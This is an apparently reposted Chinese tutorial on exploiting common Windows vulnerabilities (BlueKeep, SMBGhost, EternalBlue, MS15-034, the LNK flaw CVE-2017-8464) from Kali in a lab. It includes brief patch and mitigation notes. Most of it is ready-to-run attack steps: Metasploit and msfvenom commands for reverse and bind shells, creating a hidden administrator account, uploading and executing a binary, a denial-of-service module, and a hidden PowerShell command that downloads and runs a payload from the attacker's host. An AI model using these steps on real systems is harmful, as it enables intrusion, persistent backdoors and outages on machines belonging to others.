win常見高危漏洞


window漏洞命名規則:

CVE→國際漏洞庫編號

格式:CVE-年份-編號

MS→微軟漏洞庫編號

格式:MS年-編號

windows常見漏洞:

這里不全,僅僅例出自己測試過的一些漏洞。了解漏洞的目的是為了防止我們的服務自身存在漏洞被不法分子利用,而非為了成為不法分子!小惡魔門請繞道而行.....

ms08-067、ms12-020(3389)、ms15-034(針對iis中間件)、心臟滴血(還就是針對https443的...)、ms17-010(smb445)、震網三代(美國攻擊伊朗核電站,可還記得)、CVE-2019-0708(3389)、CVE-2020-0796(445)

漏洞檢測:

天境,激光,nessus系統漏洞掃描器

利用POC檢測:

https://github.com/ollypwn/SMBGhost

CVE-2019-0708MS12-020(遠程3389

受影響Windows系統版本:
Windows7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

靶機設置:

受害主機開啟了3389遠程連接端口

沒有打對應補丁

msf攻擊准備:

msf5 > search CVE-2019-0708

Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free


Interact with a module by name or index, for example use 1 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce                                      

msf5 >use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 主要設置RHOSTS RPORT TARGET
ps:

set RHOSTS 受害機IP設置受害機IP

set RPORT 受害機PORT設置受害機RDP端口號

info查看工具具體說明,根據靶機系統選擇targetset。

target ID數字(可選為0-4)設置受害機機器架構

使用的是VMware,那么 target 2 滿足條件

 開始攻擊

滲透后處理

建立連接以后,使用shell獲得shell

修復方法

微軟已經於2019年05月4日發布了漏洞補丁,請進行相關升級:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC

Windows XP 及Windows 2003可以在以下鏈接下載補丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

臨時解決方案

1、如暫時無法更新補丁,可以通過在系統上啟用網絡及身份認證(NLA)以暫時規避該漏洞影響。

2、在網絡外圍防火牆阻斷TCP端口3389的連接,或對相關服務器做訪問來源過濾,只允許可信IP連接。

3、禁用遠程桌面服務。

CVE-2020-0796(網絡服務器445端口攻擊

windows系統445端口默認打開

永恆之藍 2.0 來了,基於 SMBv3 漏洞Windows 8Windows Server 2012 - Windows 10 最新版全部中招,屬於系統級漏洞利用這一漏洞會使系統遭受蠕蟲型攻擊,這意味着很容易從一個受害者感染另一個受害者,一開機就感染。提權后可以做任意操作,例如加密你的文件勒索你。比如說像 EternalBlue 1.0 (永恆之藍 1.0) 一樣,加密文件,對你進行勒索虛擬貨幣!

在微軟發布修補CVE-2020-0796漏洞的安全更新之前,Cisco Talos分享了通過禁用SMBv3壓縮和攔截計算機的445端口來防御利用該漏洞發起的攻擊。

環境准備:

目標機:windows10 1903 x64     ip192.168.17.72 (關閉防火牆)

windows10 1903 x64迅雷下載:https://sl-m-ssl.xunlei.com/h5/page/download-share/index.html?entry=link&appType=PC&videobtindex=-1&storid=c39vhtrekug5&share_from=dlpage_share_link

攻擊機:kali

漏洞檢測:

利用POC檢測:

檢測工具:https://github.com/ollypwn/SMBGhost

 

漏洞攻擊:

結果:win藍屏

POC下載:https://github.com/eerykitty/CVE-2020-0796-PoC

/mnt/CVE-2020-0796-PoC-master# python3 CVE-2020-0796.py 192.168.60.52

漏洞利用-getshell

腳本下載:https://github.com/chompie1337/SMBGhost_RCE_PoC

1、 msfvenom生成正向連接木馬(反向木馬反而不好使)

有關msfvenom詳細使用可參考https://www.jianshu.com/p/dee2b171a0a0

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

 用生成的shellcodeexploit.py中的這一部分替換掉(buf后的字符串,保留USER_PAYLOAD不變)

 

2、開啟msf監聽

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888 //監聽端口
set rhost 192.168.142.129  //目標主機
run

3、運行exploit.py腳本,反彈shell

 

 

4、漏洞利用-本地提權

下載地址:https://github.com/danigargu/CVE-2020-0796/releases

如果提示找不到dll文件,那么

win10上安裝個vc運行庫就好了

 

MS17-010(網絡服務器攻擊滲透測試)

用到的靶機為:Win7,端口依然是445

我們進入msfconsole下。

一、在kali中輸入 msfconsole(等待一會可能會有點慢)
二、進入后輸人search ms17-010(就是之前的永恆之藍,也就是新聞上報道的比特幣勒索病毒)
三、找到exploit windows/smb/ms17_010_eternalblue,
運行use exploitwindows/smb/ms17_010_eternalblue

ps:由於我用的是虛擬電腦所以我環境已經配置好了。 如果你不知道哪台電腦有漏洞你可以輸入set LHOSTS 192.168.17.0/24 如果是[+]前面是這樣說明有漏洞,然后再set RHOST +IP。

五、設置TCP連接 set payload windows/x64/meterpreter/reverse_tcp

六、run或exploit進行攻擊

七、輸入shell進入對方機器增加用戶

以創建用戶 net user test 1234 /add(xxxx用戶名 1234密碼)
net localgroup administrators test /add (將用戶設置為管理員權限)

上傳文件執行

 upload /root/123.exe C:

execut -f c:\\123.exe

MS15-034(CVE-2015-1635-HTTP.SYS遠程執行代碼漏洞)

 漏洞描述

2015年4月安全補丁日,微軟發布的眾多安全更新中,修復了HTTP.sys中一處允許遠程執行代碼漏洞,編號為:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只需要發送惡意的http請求數據包,就可能遠程讀取IIS服務器的內存數據,或使服務器系統藍屏崩潰。根據公告顯示,該漏洞對服務器系統造成了不小的影響,主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內的主流服務器操作系統。

漏洞利用

1)利用ms15-034漏洞讀取服務器內存數據

借助metasploit平台,截圖如下:

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump 

set rhosts 192.168.17.72

run

2)利用ms15-034漏洞進行ddos攻擊

同樣借助metasploit平台,截圖如下:

use auxiliary/dos/http/ms15_034_ulonglongadd 

set rhosts 192.168.80.130

set threads 10

run

攻擊開始后,win7瞬間藍屏然后自動重啟

漏洞修復

禁用IIS內核緩存(可能降低IIS性能)

 

CVE-2017-8464震網三代(遠程快捷方式漏洞)

漏洞詳情

北京時間2017年6月13日凌晨,微軟官方發布6月安全補丁程序,“震網三代” LNK文件遠程代碼執行漏洞(CVE-2017-8464)和Windows搜索遠程命令執行漏洞(CVE-2017-8543).

CVE-2017-8543,當Windows搜索處理內存中的對象時,存在遠程執行代碼漏洞。成功利用此漏洞的攻擊者可以控制受影響的系統。

CVE-2017-8464,當Windows系統在解析快捷方式時,存在遠程執行任意代碼的高危漏洞,黑客可以通過U盤、網絡共享等途徑觸發漏洞,完全控制用戶系統,安全風險高危。

個人認為,該漏洞不太好用

攻擊准備

攻擊機:kali
IP地址為:192.168.10.118
靶機:win7
IP地址:192.168.10.119

受影響的版本

Windows 7

Windows 8.1

Windows RT 8.1

Windows 10

Windows Server 2008

Windows Server 2008 R2

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

實戰操作如下:

msfconsole

search 2017_8464

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.10.118(你的IP)

exploit

之后會在/root/.msf4/local目錄下生成我們的利用文件
注意:kali2.0下無法直接訪問該文件夾,可通過命令行將/root/.msf4/local/下的所有文件復制到/root/1

 

cp -r /root/.msf4/local/ /root/1

 

全部復制到移動磁盤里面(u盤拷貝),然后在msf中監聽:

search multi/handler

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.10.118 (你的IP地址)

run

payload2:利用Powershell快捷鍵

生成攻擊文件:search.ps1,終端輸入

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.100 -f psh-reflection>/opt/search.ps1

然后將/opt/目錄下的search.ps1文件移動到/var/www/html/

隨后打開Apache服務

 

service apache2 start

 

訪問web下的sp1文件

然后在目標機上建立一個快捷方式

 

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.118/search.ps1');test.ps1"

 

這里寫我們構造好的代碼

然后選中powershell.exe

再到本機上配置監聽

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118
run

 防御措施:

①增強安全意識,不貪小便宜,購物請上正規平台。

②等保不但要做,還要嚴格維持,一切工作已安全生產為中心。

 還有其他一些漏洞

......

測試方法大同小異

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM